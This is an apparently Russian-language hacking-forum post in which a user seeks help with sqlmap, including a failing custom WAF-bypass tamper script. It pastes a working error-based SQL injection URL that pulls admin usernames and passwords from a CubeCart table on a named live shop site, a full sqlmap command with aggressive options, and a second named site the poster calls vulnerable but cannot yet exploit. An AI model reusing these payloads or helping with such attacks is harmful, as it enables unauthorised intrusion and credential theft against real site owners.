А на счёт тампера я сделал так --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py файл подписал инпут расширение поставил внутрь засунул скрипт но идёт ошибка Code: [13:58:10] [CRITICAL] missing function 'tamper(payload, **kwargs)' in tamper script 'C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py' А вод полный запрос Code: sqlmap -u www.site.ru/ --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py --dbs
_ttp://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%20or(ExtractValue(1,concat(0x3a,(select(concat(username,0x3a,password))from(CubeCart_admin_users)limit+0,1))))
хелп не раскручивает( крутил как --dbms=MySQL --level=5 --risk=3 --random-agent уязвимость точно есть, но не могу раскрутить( Code: http://www.fckladionica.com:80/allnews.php?page=%5c&rc=497